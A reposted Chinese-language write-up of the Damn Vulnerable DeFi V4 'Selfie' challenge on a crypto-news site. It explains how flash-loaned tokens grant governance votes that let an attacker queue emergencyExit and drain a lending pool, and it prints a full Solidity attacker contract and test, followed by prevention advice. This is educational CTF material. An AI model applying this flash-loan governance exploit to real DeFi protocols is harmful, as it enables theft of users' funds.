热点、深度、趋势全掌握,尽在BTC区块圈

Btc Circle

致力于为全球用户提供精准、高效、去中心化的资源聚合服务。作为一站式区块链导航平台,我们深耕行业需求,整合加密货币、DeFi、NFT、Web3.0及底层技术开发等全生态资源,助力用户快速触达价值信息,赋能区块链探索之旅。

联系我们
热点、深度、趋势全掌握,尽在BTC区块圈
流行
速览
主流交易所
3 职位
查看文章
区块交易
0 职位
查看文章
区块浏览器
6 职位
查看文章
区块链基础建设
0 职位
查看文章

Featured Posts

热门快讯
1 分钟 阅读
80 查看
0
共享
0
0
0

Damn Vulnerable DeFi V4 解决方案 — #6. Selfie

btccircle
2025年5月15日
没有评论

Damn Vulnerable DeFi V4 解决方案 — #6. Selfie

方案解决专家_方案解决工程师_

此解释假定预先了解此挑战中的智能合约,并将专门关注漏洞分析。

挑战概述

一个新的借贷池已经启动!它现在提供 DVT 代币的闪电贷。它甚至包括一个花哨的治理机制来控制它。

有什么会出错,对吧?

你开始时没有 DVT 代币余额,而该池有 150 万的风险。

从池中救出所有资金,并将它们存入指定的恢复账户。

漏洞分析

我们看到的第一个漏洞是,该合约允许我们将其所有代币作为贷款借走。第二个根本问题是,治理机制没有区分代币持有者和仅暂时持有代币的账户(例如在闪电贷期间)。这造成了一个关键漏洞,即临时资本可用于影响具有永久后果的治理决策。

攻击流程借入大部分 DVT 代币的闪电贷使用这些临时持有的代币来自委托投票权排队一个治理提案,以使用他们控制的目标地址调用 emergencyExit()返回闪电贷的代币执行排队的动作来耗尽池解决方案

    contract Drainer is IERC3156FlashBorrower {
        SelfiePool pool;
        SimpleGovernance governance;
        DamnValuableVotes token;
        address recovery;
        uint256 actionId;
        bytes32 private constant CALLBACK_SUCCESS = keccak256("ERC3156FlashBorrower.onFlashLoan");
        constructor(address _pool, address _governance, address _token, address _recovery) {
            pool = SelfiePool(_pool);
            governance = SimpleGovernance(_governance);
            token = DamnValuableVotes(_token);
            recovery = _recovery;
        }
        function startAttack() external {
            uint256 amount = SelfiePool(pool).maxFlashLoan(address(token));
            SelfiePool(pool).flashLoan(this, address(token), amount, "");
        }
        function onFlashLoan(
            address sender,
            address _token,
            uint256 amount,
            uint256 fee,
            bytes calldata data
        ) external returns (bytes32) {
            require(msg.sender == address(pool), "Pool is not sender");
            require(sender == address(this), "Sender is not the owner");
            token.delegate(address(this));
            bytes memory payload = abi.encodeWithSignature("emergencyExit(address)", recovery);
            actionId = governance.queueAction(address(pool), 0, payload);
            token.approve(address(pool), amount);
            return CALLBACK_SUCCESS;
        }
        function executeProposal() external {
            governance.executeAction(actionId);
        }
    }

    /**
     * CODE YOUR SOLUTION HERE
     * 在这里编写你的解决方案
     */
    function test_selfie() public checkSolvedByPlayer {
        Drainer drainer = new Drainer(address(pool), address(governance), address(token), recovery);
        drainer.startAttack();
        vm.warp(block.timestamp + 2 days);
        drainer.executeProposal();
    }

预防机制

该合约本可以实施基于时间的投票限制,其中代币必须持有最短期限(例如 7 天)才能获得投票权,或者可以替代地使用基于快照的治理,该治理在预定的区块号捕获代币余额,而不是使用实时余额。这两种方法都将确保只有长期代币持有者才能参与治理决策。

包含解决方案的 GitHub 存储库:

查看我的 X 个人资料:

使用本文
0
共享
0
0
0
0
0
0
0
0
上一篇

国会被呼吁尽快填补加密货币监管中的潜在安全隐患
下一篇

Solana相对以太坊的崛起:华尔街是否会重新审视其潜力?

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

阅读下一页

一文说清楚以太坊生态及产品

2025年4月26日
对于很多web3的小白来说,都知道以太坊是一个很牛的链,可以做很多事情,同时是进入链圈必须掌握的知识点,但市场上层出不穷的名词以及产品搞得人眼花缭乱
1 分钟 阅读
80 查看
阅读更多